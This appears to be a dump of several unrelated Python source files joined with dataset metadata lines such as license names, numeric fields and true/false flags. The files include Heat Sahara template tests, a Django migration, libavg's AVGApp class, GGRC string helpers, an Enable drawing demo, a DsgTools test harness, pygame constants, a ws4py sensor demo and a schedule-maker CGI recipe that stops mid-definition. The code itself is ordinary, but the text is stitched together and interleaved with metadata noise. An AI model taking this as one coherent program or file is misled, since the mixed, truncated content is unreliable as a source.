self.t['resources']['node-group']['properties'].pop('floating_ip_pool')
self.t['resources']['node-group']['properties'].pop('volume_type')
ngt = self._init_ngt(self.t)
self.patchobject(nova.FlavorConstraint, 'validate'
).return_value = False
self.patchobject(ngt, 'is_using_neutron').return_value = False
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual(u"Property error: "
u"resources.node-group.properties.flavor: "
u"Error validating value 'm1.large'",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(node_group_template_without_name)
stack = utils.parse_stack(tmpl)
ngt = stack['node_group!']
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
name = self.ngt_mgr.create.call_args[1]['name']
self.assertIn('-nodegroup-', name)
def test_ngt_show_resource(self):
ngt = self._create_ngt(self.t)
self.ngt_mgr.get.return_value = self.fake_ngt
self.assertEqual({"ng-template": "info"}, ngt.FnGetAtt('show'))
self.ngt_mgr.get.assert_called_once_with('some_ng_id')
def test_validate_node_processes_fails(self):
ngt = self._init_ngt(self.t)
plugin_mock = mock.MagicMock()
plugin_mock.node_processes = {
"HDFS": ["namenode", "datanode", "secondarynamenode"],
"JobFlow": ["oozie"]
}
self.plugin_mgr.get_version_details.return_value = plugin_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertIn("resources.node-group.properties: Plugin vanilla "
"doesn't support the following node processes: "
"jobtracker. Allowed processes are: ",
six.text_type(ex))
self.assertIn("namenode", six.text_type(ex))
self.assertIn("datanode", six.text_type(ex))
self.assertIn("secondarynamenode", six.text_type(ex))
self.assertIn("oozie", six.text_type(ex))
def test_update(self):
ngt = self._create_ngt(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)['node-group']
rsrc_defn['Properties']['node_processes'] = [
'tasktracker', 'datanode']
scheduler.TaskRunner(ngt.update, rsrc_defn)()
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['tasktracker', 'datanode'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.update.assert_called_once_with('some_ng_id', **args)
self.assertEqual((ngt.UPDATE, ngt.COMPLETE), ngt.state)
class SaharaClusterTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaClusterTemplateTest, self).setUp()
self.patchobject(st.constraints.CustomConstraint, '_is_valid'
).return_value = True
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_network_id'
sahara_mock = mock.MagicMock()
self.ct_mgr = sahara_mock.cluster_templates
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ct = FakeClusterTemplate()
self.t = template_format.parse(cluster_template)
def _init_ct(self, template):
self.stack = utils.parse_stack(template)
return self.stack['cluster-template']
def test_ct_resource_mapping(self):
ct = self._init_ct(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaClusterTemplate,
mapping['OS::Sahara::ClusterTemplate'])
self.assertIsInstance(ct,
st.SaharaClusterTemplate)
def _create_ct(self, template):
ct = self._init_ct(template)
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
return ct
def test_ct_create(self):
self._create_ct(self.t)
args = {
'name': 'test-cluster-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.create.assert_called_once_with(**args)
def test_ct_validate_no_network_on_neutron_fails(self):
self.t['resources']['cluster-template']['properties'].pop(
'neutron_management_network')
ct = self._init_ct(self.t)
self.patchobject(ct, 'is_using_neutron', return_value=True)
ex = self.assertRaises(exception.StackValidationFailed,
ct.validate)
self.assertEqual("neutron_management_network must be provided",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(cluster_template_without_name)
stack = utils.parse_stack(tmpl)
ct = stack['cluster_template!']
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
name = self.ct_mgr.create.call_args[1]['name']
self.assertIn('-clustertemplate-', name)
def test_ct_show_resource(self):
ct = self._create_ct(self.t)
self.ct_mgr.get.return_value = self.fake_ct
self.assertEqual({"cluster-template": "info"}, ct.FnGetAtt('show'))
self.ct_mgr.get.assert_called_once_with('some_ct_id')
def test_update(self):
ct = self._create_ct(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)[
'cluster-template']
rsrc_defn['Properties']['plugin_name'] = 'hdp'
rsrc_defn['Properties']['hadoop_version'] = '1.3.2'
scheduler.TaskRunner(ct.update, rsrc_defn)()
args = {
'name': 'test-cluster-template',
'plugin_name': 'hdp',
'hadoop_version': '1.3.2',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.update.assert_called_once_with('some_ct_id', **args)
self.assertEqual((ct.UPDATE, ct.COMPLETE), ct.state)
|
apache-2.0
| -4,499,161,583,605,528,000
| 38.205805
| 79
| 0.605761
| false
| 3.784768
| true
| false
| false
|
dumel93/project-
|
type_page/migrations/0002_auto_20170711_1101.py
|
1
|
1481
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-11 11:01
from __future__ import unicode_literals
import django.contrib.auth.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('type_page', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FootballType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=64, null=True)),
('second_team', models.CharField(max_length=64, null=True)),
('draw', models.BooleanField(default=True)),
('date_game', models.DateTimeField()),
('league', models.CharField(max_length=64)),
('course', models.IntegerField()),
('bet', models.IntegerField()),
],
options={
'ordering': ['date_game'],
},
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.ASCIIUsernameValidator()], verbose_name='username'),
),
]
|
mit
| -2,548,361,275,656,014,000
| 39.027027
| 315
| 0.576637
| false
| 4.343109
| false
| false
| false
|
lynxis/libavg
|
src/python/avgapp.py
|
1
|
4330
|
# libavg - Media Playback Engine.
# Copyright (C) 2003-2011 Ulrich von Zadow
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Current versions can be found at www.libavg.de
#
# Original author of this file is Martin Heistermann <mh at sponc dot de>
#
from appstarter import AppStarter
class AVGApp(object):
_instances = {}
multitouch = False
fakeFullscreen = False
def __init__(self, parentNode):
'''
Initialization before Player.play()
Use this only when needed, e.g. for
WordsNode.addFontDir(). Do not forget to call
super(YourApp, self).__init__(parentNode)
'''
import warnings
warnings.warn('AVGApp is deprecated, use libavg.app.App instead')
appname = self.__class__.__name__
if appname in AVGApp._instances:
raise RuntimeError('App %s already setup' % appname)
AVGApp._instances[appname] = self
self.__isRunning = False
self._parentNode = parentNode
self._starter = None
if 'onKey' in dir(self):
raise DeprecationWarning, \
'AVGApp.onKey() has been renamed to AVGApp.onKeyDown().'
@classmethod
def get(cls):
'''
Get the Application instance
Note: this class method has to be called from the top-level app class:
>>> class MyApp(libavg.AVGApp):
... pass
>>> instance = MyApp.get()
'''
return cls._instances.get(cls.__name__, None)
@classmethod
def start(cls, **kwargs):
if cls.multitouch:
from appstarter import AVGMTAppStarter
starter = AVGMTAppStarter
else:
from appstarter import AVGAppStarter
starter = AVGAppStarter
starter(appClass=cls, fakeFullscreen=cls.fakeFullscreen, **kwargs)
def init(self):
"""main initialization
build node hierarchy under self.__parentNode."""
pass
def exit(self):
"""Deinitialization
Called after player.play() returns. End of program run."""
pass
def _enter(self):
"""enter the application, internal interface.
override this and start all animations, intervals
etc. here"""
pass
def _leave(self):
"""leave the application, internal interface.
override this and stop all animations, intervals
etc. Take care your application does not use any
non-needed resources after this."""
pass
def enter(self, onLeave = lambda: None):
"""enter the application, external interface.
Do not override this."""
self.__isRunning = True
self._onLeave = onLeave
self._enter()
def leave(self):
"""leave the application, external interface.
Do not override this."""
self.__isRunning = False
self._onLeave()
self._leave()
def onKeyDown(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def onKeyUp(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def isRunning(self):
return self.__isRunning
def setStarter(self, starter):
self._starter = starter
def getStarter(self):
return self._starter
class App(object):
@classmethod
def start(cls, *args, **kargs):
raise RuntimeError('avgapp.App cannot be used any longer. Use libavg.AVGApp for '
'a compatible class or switch to the new libavg.app.App')
|
lgpl-2.1
| -1,709,239,406,444,618,200
| 29.492958
| 89
| 0.627483
| false
| 4.325674
| false
| false
| false
|
plamut/ggrc-core
|
test/selenium/src/lib/utils/string_utils.py
|
1
|
1860
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Utility functions for string operations."""
import random
import string
import uuid
BLANK = ''
COMMA = ',' # comma is used as delimiter for multi-choice values
LESS = '<' # need exclude this character due to issue GGRC-527
DOUBLE_QUOTES = '"' # need exclude this character due to issue GGRC-931
BACKSLASH = '\\' # need exclude this character due to issue GGRC-931
EXCLUDE = COMMA + LESS + DOUBLE_QUOTES + BACKSLASH
SPECIAL = BLANK.join(_ for _ in string.punctuation if _ not in EXCLUDE)
def random_string(size=5, chars=string.letters + string.digits + SPECIAL):
"""Return string with corresponding size that filled by values from selected
chars.
"""
return BLANK.join(random.choice(chars) for position in range(size))
def random_uuid(length=13):
"""Return string with predefined length base on UUID."""
return str(uuid.uuid4())[:length]
def random_list_strings(list_len=3, item_size=5,
chars=string.letters + string.digits + SPECIAL):
"""Return list of random strings separated by comma."""
return COMMA.join(random_string(item_size, chars) for i in range(list_len))
def get_bool_from_string(str_to_bool):
"""Return True for 'Yes' and False for 'No'."""
if str_to_bool.title() == 'Yes':
return True
elif str_to_bool.title() == 'No':
return False
else:
raise ValueError("'{}' can't be converted to boolean".format(str_to_bool))
def remap_keys_for_list_dicts(dict_transformation_keys, list_dicts):
"""Remap keys names for old list of dictionaries according
transformation dictionary {OLD KEY: NEW KEY} and return new updated
list of dictionaries.
"""
return [{dict_transformation_keys[key]: value for key, value
in dic.iteritems()} for dic in list_dicts]
|
apache-2.0
| -5,070,785,767,555,766,000
| 34.769231
| 78
| 0.703763
| false
| 3.632813
| false
| false
| false
|
tommy-u/enable
|
examples/enable/component_demo.py
|
1
|
1333
|
"""
Basic demo of drawing within an Enable component.
"""
from enable.api import Component, ComponentEditor
from traits.api import HasTraits, Instance
from traitsui.api import Item, View
class MyComponent(Component):
def draw(self, gc, **kwargs):
w,h = gc.width(), gc.height()
gc.clear()
# Draw a rounded rect just inside the bounds
gc.set_line_width(2.0)
gc.set_stroke_color((0.0, 0.0, 0.0, 1.0))
r = 15
b = 3
gc.move_to(b, h/2)
gc.arc_to(b, h-b,
w/2, h-b,
r)
gc.arc_to(w-b, h-b,
w-b, h/2,
r)
gc.arc_to(w-b, b,
w/2, b,
r)
gc.arc_to(b, b,
b, h/2,
r)
gc.line_to(b, h/2)
gc.stroke_path()
return
def normal_key_pressed(self, event):
print "key pressed: ", event.character
class Demo(HasTraits):
canvas = Instance(Component)
traits_view = View(Item('canvas', editor=ComponentEditor(),
show_label=False, width=200, height=200),
resizable=True, title="Component Example")
def _canvas_default(self):
return MyComponent()
if __name__ == "__main__":
Demo().configure_traits()
|
bsd-3-clause
| 8,483,525,954,035,567,000
| 24.150943
| 69
| 0.501875
| false
| 3.51715
| false
| false
| false
|
lcoandrade/DsgTools
|
tests/test_OtherAlgorithms.py
|
1
|
2763
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-07-04
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : esperidiao.joao@eb.mil.br
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Script designed to test each validation algorithm from DSGTools 4.X.
It is supposed to be run through QGIS with DSGTools installed.
* This is merely a prototype for our unit test suite. *
"""
import os
import sys
import warnings
import yaml
import shutil
from osgeo import ogr
import processing
from qgis.utils import iface
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsProcessingFeedback,\
QgsProcessingContext, QgsLayerTreeLayer, QgsProject
from qgis.PyQt.QtSql import QSqlDatabase
from DsgTools.core.dsgEnums import DsgEnums
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.Factories.LayerLoaderFactory.layerLoaderFactory import LayerLoaderFactory
from qgis.testing import unittest
from DsgTools.tests.algorithmsTestBase import AlgorithmsTest, GenericAlgorithmsTest
class Tester(GenericAlgorithmsTest, AlgorithmsTest):
@classmethod
def setUpClass(cls):
cls.cleanup_paths = []
@classmethod
def tearDownClass(cls):
QgsProject.instance().clear()
for path in cls.cleanup_paths:
shutil.rmtree(path)
def get_definition_file(self):
return 'otherAlgorithms.yaml'
def run_all(filterString=None):
"""Default function that is called by the runner if nothing else is specified"""
filterString = 'test_' if filterString is None else filterString
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(Tester, filterString))
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(suite)
|
gpl-2.0
| 1,559,963,913,760,249,000
| 38.442857
| 102
| 0.56791
| false
| 4.810105
| true
| false
| false
|
CTPUG/pygame_cffi
|
pygame/constants.py
|
1
|
3624
|
# pygame_cffi - a cffi implementation of the pygame library
# Copyright (C) 2013 Neil Muller
# Copyright (C) 2013 Jeremy Thurgood
# Copyright (C) 2013 Maciej Fijalkowski
# Copyright (C) 2014 Rizmari Versfeld
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the Free
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA
""" pygame constants """
from pygame._sdl import sdl
# Event types
NOEVENT = sdl.SDL_NOEVENT
ACTIVEEVENT = sdl.SDL_ACTIVEEVENT
KEYDOWN = sdl.SDL_KEYDOWN
KEYUP = sdl.SDL_KEYUP
MOUSEMOTION = sdl.SDL_MOUSEMOTION
MOUSEBUTTONDOWN = sdl.SDL_MOUSEBUTTONDOWN
MOUSEBUTTONUP = sdl.SDL_MOUSEBUTTONUP
JOYAXISMOTION = sdl.SDL_JOYAXISMOTION
JOYBALLMOTION = sdl.SDL_JOYBALLMOTION
JOYHATMOTION = sdl.SDL_JOYHATMOTION
JOYBUTTONDOWN = sdl.SDL_JOYBUTTONDOWN
JOYBUTTONUP = sdl.SDL_JOYBUTTONUP
QUIT = sdl.SDL_QUIT
SYSWMEVENT = sdl.SDL_SYSWMEVENT
EVENT_RESERVEDA = sdl.SDL_EVENT_RESERVEDA
EVENT_RESERVEDB = sdl.SDL_EVENT_RESERVEDB
VIDEORESIZE = sdl.SDL_VIDEORESIZE
VIDEOEXPOSE = sdl.SDL_VIDEOEXPOSE
EVENT_RESERVED2 = sdl.SDL_EVENT_RESERVED2
EVENT_RESERVED3 = sdl.SDL_EVENT_RESERVED3
EVENT_RESERVED4 = sdl.SDL_EVENT_RESERVED4
EVENT_RESERVED5 = sdl.SDL_EVENT_RESERVED5
EVENT_RESERVED6 = sdl.SDL_EVENT_RESERVED6
EVENT_RESERVED7 = sdl.SDL_EVENT_RESERVED7
USEREVENT = sdl.SDL_USEREVENT
NUMEVENTS = sdl.SDL_NUMEVENTS
USEREVENT_DROPFILE = 0x1000
# Surface things
SWSURFACE = sdl.SDL_SWSURFACE
HWSURFACE = sdl.SDL_HWSURFACE
LIL_ENDIAN = sdl.SDL_LIL_ENDIAN
FULLSCREEN = sdl.SDL_FULLSCREEN
RESIZABLE = sdl.SDL_RESIZABLE
NOFRAME = sdl.SDL_NOFRAME
DOUBLEBUF = sdl.SDL_DOUBLEBUF
HWACCEL = sdl.SDL_HWACCEL
ASYNCBLIT = sdl.SDL_ASYNCBLIT
RLEACCEL = sdl.SDL_RLEACCEL
RLEACCELOK = sdl.SDL_RLEACCELOK
SRCALPHA = sdl.SDL_SRCALPHA
SRCCOLORKEY = sdl.SDL_SRCCOLORKEY
HWPALETTE = sdl.SDL_HWPALETTE
ANYFORMAT = sdl.SDL_ANYFORMAT
BLEND_RGB_ADD = 0x01
BLEND_RGB_SUB = 0x02
BLEND_RGB_MULT = 0x03
BLEND_RGB_MIN = 0x04
BLEND_RGB_MAX = 0x05
BLEND_RGBA_ADD = 0x06
BLEND_RGBA_SUB = 0x07
BLEND_RGBA_MULT = 0x08
BLEND_RGBA_MIN = 0x09
BLEND_RGBA_MAX = 0x10
BLEND_PREMULTIPLIED = 0x11
BLEND_ADD = BLEND_RGB_ADD
BLEND_SUB = BLEND_RGB_SUB
BLEND_MULT = BLEND_RGB_MULT
BLEND_MIN = BLEND_RGB_MIN
BLEND_MAX = BLEND_RGB_MAX
# OpenGL stuff
OPENGL = sdl.SDL_OPENGL
GL_RED_SIZE = sdl.SDL_GL_RED_SIZE
GL_GREEN_SIZE = sdl.SDL_GL_GREEN_SIZE
GL_BLUE_SIZE = sdl.SDL_GL_BLUE_SIZE
GL_ALPHA_SIZE = sdl.SDL_GL_ALPHA_SIZE
GL_BUFFER_SIZE = sdl.SDL_GL_BUFFER_SIZE
GL_DOUBLEBUFFER = sdl.SDL_GL_DOUBLEBUFFER
GL_DEPTH_SIZE = sdl.SDL_GL_DEPTH_SIZE
GL_STENCIL_SIZE = sdl.SDL_GL_STENCIL_SIZE
GL_ACCUM_RED_SIZE = sdl.SDL_GL_ACCUM_RED_SIZE
GL_ACCUM_GREEN_SIZE = sdl.SDL_GL_ACCUM_GREEN_SIZE
GL_ACCUM_BLUE_SIZE = sdl.SDL_GL_ACCUM_BLUE_SIZE
GL_ACCUM_ALPHA_SIZE = sdl.SDL_GL_ACCUM_ALPHA_SIZE
GL_STEREO = sdl.SDL_GL_STEREO
GL_MULTISAMPLEBUFFERS = sdl.SDL_GL_MULTISAMPLEBUFFERS
GL_MULTISAMPLESAMPLES = sdl.SDL_GL_MULTISAMPLESAMPLES
GL_ACCELERATED_VISUAL = sdl.SDL_GL_ACCELERATED_VISUAL
GL_SWAP_CONTROL = sdl.SDL_GL_SWAP_CONTROL
# Keys
from pygame._sdl_keys import *
|
lgpl-2.1
| 2,889,663,793,123,178,000
| 29.2
| 68
| 0.772903
| false
| 2.590422
| false
| false
| false
|
KanoComputing/nush
|
ws4py/droid_sensor_cherrypy_server.py
|
1
|
2357
|
# -*- coding: utf-8 -*-
import os.path
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import WebSocket
class BroadcastWebSocketHandler(WebSocket):
def received_message(self, m):
cherrypy.engine.publish('websocket-broadcast', str(m))
class Root(object):
@cherrypy.expose
def index(self):
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>WebSocket example displaying Android device sensors</title>
<link rel="stylesheet" href="/css/style.css" type="text/css" />
<script type="application/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"> </script>
<script type="application/javascript" src="https://raw.github.com/caleb531/jcanvas/master/jcanvas.min.js"> </script>
<script type="application/javascript" src="/js/droidsensor.js"> </script>
<script type="application/javascript">
$(document).ready(function() {
initWebSocket();
drawAll();
});
</script>
</head>
<body>
<section id="content" class="body">
<canvas id="canvas" width="900" height="620"></canvas>
</section>
</body>
</html>
"""
@cherrypy.expose
def ws(self):
cherrypy.log("Handler created: %s" % repr(cherrypy.request.ws_handler))
if __name__ == '__main__':
cherrypy.config.update({
'server.socket_host': '192.168.0.12',
'server.socket_port': 11000,
'tools.staticdir.root': os.path.abspath(os.path.join(os.path.dirname(__file__), 'static'))
}
)
print os.path.abspath(os.path.join(__file__, 'static'))
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
cherrypy.quickstart(Root(), '', config={
'/js': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'js'
},
'/css': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'css'
},
'/images': {
'tools.staticdir.on': True,
'tools.staticdir.dir': 'images'
},
'/ws': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': BroadcastWebSocketHandler
}
}
)
|
gpl-3.0
| -3,472,286,452,983,433,700
| 31.287671
| 125
| 0.585914
| false
| 3.735341
| false
| false
| false
|
ActiveState/code
|
recipes/Python/475112_Schedule_Maker/recipe-475112.py
|
1
|
14819
|
################################################################################
# index.py
################################################################################
import html_help
import os
import sys
import time
import Zcgi
KEYS = 'description', 'start', 'end', 'sunday', 'monday', \
'tuesday', 'wednesday', 'thursday', 'friday', 'saturday'
class soft_dict:
def __init__(self, dictionary, format):
self.__dictionary = dictionary
self.__format = format
def __getitem__(self, key):
try:
if self.__dictionary[key]:
return self.__format % self.__dictionary[key]
except:
pass
return ''
class WeekError:
def __init__(self, string):
self.__string = string
def __str__(self):
return self.__string
def main():
if Zcgi.dictionary is None:
show_form()
elif has_keys(Zcgi.dictionary, KEYS):
show_table()
else:
show_form()
def show_form(error=''):
if error:
error = '\t\t<b>' + error + '</b>\n'
values = soft_dict(Zcgi.dictionary, ' value="%s"')
Zcgi.print_html('''<html>
\t<head>
\t\t<title>
\t\t\tSchedule Maker
\t\t</title>
\t</head>
\t<body>
%s\t\t<form action="%s">
\t\t\tDescription:<br>
\t\t\t<input type="text"%s name="description" size="25"><br>
\t\t\tStart Date:<br>
\t\t\t<input type="text"%s name="start" size="25"><br>
\t\t\tEnd Date:<br>
\t\t\t<input type="text"%s name="end" size="25"><br>
\t\t\tSunday:<br>
\t\t\t<input type="text"%s name="sunday" size="25"><br>
\t\t\tMonday:<br>
\t\t\t<input type="text"%s name="monday" size="25"><br>
\t\t\tTuesday:<br>
\t\t\t<input type="text"%s name="tuesday" size="25"><br>
\t\t\tWednesday:<br>
\t\t\t<input type="text"%s name="wednesday" size="25"><br>
\t\t\tThursday:<br>
\t\t\t<input type="text"%s name="thursday" size="25"><br>
\t\t\tFriday:<br>
\t\t\t<input type="text"%s name="friday" size="25"><br>
\t\t\tSaturday:<br>
\t\t\t<input type="text"%s name="saturday" size="25"><br>
\t\t\t<input type="submit" value="Create Schedule">
\t\t</form>
\t</body>
</html>''' % tuple([error, os.path.basename(sys.argv[0])] \
+ unpack(values, KEYS)))
def has_keys(dictionary, keys):
for key in keys:
if not dictionary.has_key(key):
return False
return True
def show_table():
values = Zcgi.dictionary
if not values['description']:
show_form('You must enter a description.')
try:
start = time.strptime(values['start'], '%m/%d/%y')
end = time.strptime(values['end'], '%m/%d/%y')
except:
show_form('Dates must be in the MM/DD/YY format.')
try:
assert time.mktime(end) > time.mktime(start)
except:
show_form('The end date must come after the start date.')
try:
check_week(values, KEYS[3:])
except WeekError, problem:
show_form(str(problem))
html = create_html(values['description'], start, end, unpack(values, KEYS[3:]))
Zcgi.print_html(html)
def unpack(values, keys):
unpacked = []
for key in keys:
unpacked.append(values[key])
return unpacked
def check_week(dictionary, keys):
for key in keys:
try:
if not dictionary[key]:
continue
hm = dictionary[key].split('-')
assert len(hm) == 2
first = time.strptime(hm[0].strip(), '%H:%M')
second = time.strptime(hm[1].strip(), '%H:%M')
dictionary[key] = hm[0].strip() + ' - ' + hm[1].strip()
except:
raise WeekError(key.capitalize() + ' should be in the HH:MM - HH:MM format.')
try:
assert second.tm_hour * 60 + second.tm_min > first.tm_hour * 60 + first.tm_min
except:
raise WeekError('Start time must come before end time on ' + key.capitalize() + '.')
def create_html(description, start, end, week):
html = '''<html>
\t<head>
\t\t<title>
\t\t\tThe Schedule
\t\t</title>
\t</head>
\t<body>
\t\t<center>
'''
start_month = start.tm_year * 12 + (start.tm_mon - 1)
end_month = end.tm_year * 12 + (end.tm_mon - 1)
for month in range(start_month, end_month + 1):
html += html_help.html_table(1, 1, 3, '\t').mutate(0, 0, create_month_html(description, start, end, week, month)).html() + '\n'
if month != end_month:
html += '\t\t\t<hr>\n'
return html + '\t\t</center>\n\t</body>\n</html>'
def create_month_html(description, start, end, week, month):
start = time.mktime(start) - 43200
end = time.mktime(end) + 43200
now = time.strptime(str((month / 12) % 100).zfill(2) + ' ' + str(month % 12 + 1) + ' 01', '%y %m %d')
html = '<b>' + time.strftime('%B %Y', now) + '</b>\n'
html_month = html_help.html_month((month / 12) % 100, month % 12 + 1, 0, '\t')
html_month.table_option('border="1" width="800"').row_option('valign="top"').column_option('width="14%"')
now_month = now.tm_mon
while now.tm_mon == now_month:
mktime = time.mktime(now)
if start <= mktime <= end:
week_day = (now.tm_wday + 1) % 7
if week[week_day]:
html_month.mutate(now.tm_mday, '<b>' + description + '</b><br>\n' + week[week_day])
now = time.localtime(mktime + 86400)
return html + html_month.html()
if __name__ == '__main__':
Zcgi.execute(main, 'cgi')
################################################################################
# html_help.py
################################################################################
import time
import Zam
class html_table:
def __init__(self, rows, columns, indent, style):
self.__matrix = Zam.matrix(rows, columns, '')
self.__indent = indent
self.__style = style
self.__table_option = ''
self.__row_option = ''
self.__column_option = ''
def mutate(self, row, column, text):
assert type(text) is str
self.__matrix[row][column] = text
return self
def access(self, row, column):
return self.__matrix[row][column]
def table_option(self, string):
assert type(string) is str
self.__table_option = string
return self
def row_option(self, string):
assert type(string) is str
self.__row_option = string
return self
def column_option(self, string):
assert type(string) is str
self.__column_option = string
return self
def html(self):
html = self.__style * self.__indent + '<table'
if self.__table_option:
html += ' ' + self.__table_option
html += '>\n'
for row in self.__matrix:
html += self.__style * (self.__indent + 1) + '<tr'
if self.__row_option:
html += ' ' + self.__row_option
html += '>\n'
for item in row:
html += self.__style * (self.__indent + 2) + '<td'
if self.__column_option:
html += ' ' + self.__column_option
html += '>\n'
html += ''.join([self.__style * (self.__indent + 3) + line + '\n' for line in item.splitlines()])
html += self.__style * (self.__indent + 2) + '</td>\n'
html += self.__style * (self.__indent + 1) + '</tr>\n'
return html + self.__style * self.__indent + '</table>'
class html_month:
def __init__(self, year, month, indent, style):
matrix = self.__make_matrix(year, month)
self.__table = html_table(len(matrix) + 1, 7, indent, style)
for index, item in enumerate(('Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday')):
self.__table.mutate(0, index, '<b>' + item + '</b>')
for row in range(len(matrix)):
for column in range(7):
if matrix[row][column]:
self.__table.mutate(row + 1, column, '<b>' + str(matrix[row][column]).zfill(2) + '</b>\n<hr>\n')
def __make_matrix(self, year, month):
rows = [Zam.array(7, 0)]
row = 0
now = time.localtime(time.mktime(time.strptime(str(year).zfill(2) + ' ' + str(month).zfill(2) + ' 01', '%y %m %d')) + 14400)
self.__first_day = (now.tm_wday + 1) % 7
once = False
while now.tm_mon == month:
if once:
if now.tm_wday == 6:
rows.append(Zam.array(7, 0))
row += 1
else:
once = True
rows[row][(now.tm_wday + 1) % 7] = now.tm_mday
self.__days_in_month = now.tm_mday
now = time.localtime(time.mktime(now) + 86400)
return rows
def mutate(self, day, text):
row, column = self.__get_pos(day)
self.__table.mutate(row, column, self.__table.access(row, column)[:15] + text)
return self
def access(self, day):
row, column = self.__get_pos(day)
return self.__table.access(row, column)[15:]
def __get_pos(self, day):
assert 1 <= day <= self.__days_in_month
pos = self.__first_day - 1 + day
return pos / 7 + 1, pos % 7
def table_option(self, string):
self.__table.table_option(string)
return self
def row_option(self, string):
self.__table.row_option(string)
return self
def column_option(self, string):
self.__table.column_option(string)
return self
def html(self):
return self.__table.html()
################################################################################
# Zam.py
################################################################################
# Name & Description
# ==================
'''Support module for array and matrix use.
This module provides two classes that emulate one and two
dimentional lists with fixed sizes but mutable internals.'''
# Data & Imports
# ==============
__all__ = ['array', 'matrix']
__version__ = '1.1'
import sys
# Public Names
# ============
class array(object):
'''array(length) -> new array
array(length, value) -> initialized from value'''
def __init__(self, length, value=None):
